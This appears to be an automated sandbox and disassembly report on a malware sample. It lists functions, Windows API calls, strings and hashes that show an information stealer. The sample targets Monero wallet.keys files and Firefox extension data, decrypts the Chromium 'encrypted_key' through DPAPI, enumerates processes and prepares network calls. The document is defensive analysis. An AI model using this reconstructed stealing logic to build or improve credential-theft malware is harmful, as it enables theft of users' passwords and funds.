Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: d0b33e3c9426d3ef23f9959a5cefc2319bd275423a4d6b9591a92fa1ef9c700a
Instruction ID: 41bcce7dbb222f05637192eacb364642f0197f751b6c8129036cc9214aa22d9c
Opcode Fuzzy Hash: d0b33e3c9426d3ef23f9959a5cefc2319bd275423a4d6b9591a92fa1ef9c700a
Instruction Fuzzy Hash: 1E813671C10908ABDB1AFBB0DC92DEE7738AF54304F404118F647BA891EF346A09DB62

Function 003AF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Part of subcall function 003A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003A99EC
Part of subcall function 003A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003A9A11
Part of subcall function 003A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003A9A31
Part of subcall function 003A99C0: ReadFile.KERNEL32(000000FF,?,00000000,003A148F,00000000), ref: 003A9A5A
Part of subcall function 003A99C0: LocalFree.KERNEL32(003A148F), ref: 003A9A90
Part of subcall function 003A99C0: CloseHandle.KERNEL32(000000FF), ref: 003A9A9A

Part of subcall function 003B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003B8E52

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003C1580,003C0D92), ref: 003AF54C
lstrlen.KERNEL32(00000000), ref: 003AF56B

Strings

^userContextId=4294967295, xrefs: 003AF59C
moz-extension+++, xrefs: 003AF5AD

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: f6dcf4946dd3f542e86312fc5dfecce67b54f6aa588182105c6089173c09ac9e
Instruction ID: a870cda378293b29183b9f8c7c2466abbaa6ac97a55e425231461b3458b59d98
Opcode Fuzzy Hash: f6dcf4946dd3f542e86312fc5dfecce67b54f6aa588182105c6089173c09ac9e
Instruction Fuzzy Hash: B4514571D00A08BADB15FBF0DC96DED7778AF54304F408528F506AB991EF346A09DBA2

Function 003B70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON

Download Yara Rule

Strings

s;, xrefs: 003B7111
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003B718C
s;, xrefs: 003B72AE, 003B7179, 003B717C

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: s;$s;$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-2081354075
Opcode ID: 51c542ce213a17e2f53c7c304cec469750740c338fc0cb3cdc6b32b5a608c7c3
Instruction ID: e0ee4fb644b1aaf441d415f89708010b5526f953539fe3d907fcce7698959863
Opcode Fuzzy Hash: 51c542ce213a17e2f53c7c304cec469750740c338fc0cb3cdc6b32b5a608c7c3
Instruction Fuzzy Hash: 625162B0C04618AFDB25EB94DC95BEEB774EF44308F1044A8E215BB581EB746E88CF64

Function 003A9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003A99EC
Part of subcall function 003A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003A9A11
Part of subcall function 003A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003A9A31
Part of subcall function 003A99C0: ReadFile.KERNEL32(000000FF,?,00000000,003A148F,00000000), ref: 003A9A5A
Part of subcall function 003A99C0: LocalFree.KERNEL32(003A148F), ref: 003A9A90
Part of subcall function 003A99C0: CloseHandle.KERNEL32(000000FF), ref: 003A9A9A

Part of subcall function 003B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003B8E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003A9D39

Part of subcall function 003A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N:,00000000,00000000), ref: 003A9AEF
Part of subcall function 003A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003A4EEE,00000000,?), ref: 003A9B01
Part of subcall function 003A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N:,00000000,00000000), ref: 003A9B2A
Part of subcall function 003A9AC0: LocalFree.KERNEL32(?,?,?,?,003A4EEE,00000000,?), ref: 003A9B3F

Part of subcall function 003A9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003A9B84
Part of subcall function 003A9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 003A9BA3
Part of subcall function 003A9B60: LocalFree.KERNEL32(?), ref: 003A9BD3

Strings

, xrefs: 003A9DC1
"encrypted_key":", xrefs: 003A9D30
DPAPI, xrefs: 003A9D89

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 1d235aa09a7d29d75f28cb43950286cf94b051ded42433a49ba9e9c7af849e8c
Instruction ID: 4d0ec5df1ac8c15740e9e9a7a66c8ed3ff7541033e553e897d2e06875b935864
Opcode Fuzzy Hash: 1d235aa09a7d29d75f28cb43950286cf94b051ded42433a49ba9e9c7af849e8c
Instruction Fuzzy Hash: A3311DB6D10209ABCB15DFE4DC85BEFB7B8EB49304F144519EA05B7241EB309A44CBA1

Function 003B8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003C05B7), ref: 003B86CA
Process32First.KERNEL32(?,00000128), ref: 003B86DE
Process32Next.KERNEL32(?,00000128), ref: 003B86F3

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

CloseHandle.KERNEL32(?), ref: 003B8761

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: fd3e3be2f4c1808846167e900ce2adf6fef8737e5fa54b1e66ccbb40e878da11
Instruction ID: a3592641271b6078ce82ca8aa90f54b6c77d67f18148f265224e716bb40ee2ef
Opcode Fuzzy Hash: fd3e3be2f4c1808846167e900ce2adf6fef8737e5fa54b1e66ccbb40e878da11
Instruction Fuzzy Hash: C3316F71901A18ABCB26DF90CC91FEEB77CEF45704F104199E209AA990DF306E45CFA1

Function 003B6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F38798,?,003C110C,?,00000000,?,003C1110,?,00000000,003C0AEF), ref: 003B6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003B6AE8
CloseHandle.KERNEL32(00000000), ref: 003B6AF9
Sleep.KERNEL32(00001770), ref: 003B6B04
CloseHandle.KERNEL32(?,00000000,?,00F38798,?,003C110C,?,00000000,?,003C1110,?,00000000,003C0AEF), ref: 003B6B1A
ExitProcess.KERNEL32 ref: 003B6B22

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 0ba141817cb1cc43d370f8f5e4229b309fe149030076c24b1e86cfbbd9979cae
Instruction ID: 68eca5d61f921bafae59ce290fac924cca128debdfda8549f02ac19e0ebb54a8
Opcode Fuzzy Hash: 0ba141817cb1cc43d370f8f5e4229b309fe149030076c24b1e86cfbbd9979cae
Instruction Fuzzy Hash: 44F0BE70A04619ABEB02EBB0CC47BFD7B38EB14308F104414B743A98C2CBB42500E662

Function 003A47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003A4839
InternetCrackUrlA.WININET(00000000,00000000), ref: 003A4849

Strings

<, xrefs: 003A47C9

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 858811b612b79627ba66d047298289489ed32edacccc4580646c9948ae15eef6
Instruction ID: e2986a6ffeb1f1aa2e020edaa53bb30597f913e2f4b6707262af90039f9c78ab
Opcode Fuzzy Hash: 858811b612b79627ba66d047298289489ed32edacccc4580646c9948ae15eef6
Instruction Fuzzy Hash: DE214FB1D01209ABDF14DFA5EC45ADE7B78FB45320F108625FA55AB2C0EB706A09CF91

Function 003B51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Part of subcall function 003A6280: InternetOpenA.WININET(003C0DFE,00000001,00000000,00000000,00000000), ref: 003A62E1
Part of subcall function 003A6280: StrCmpCA.SHLWAPI(?,00F3EFF8), ref: 003A6303
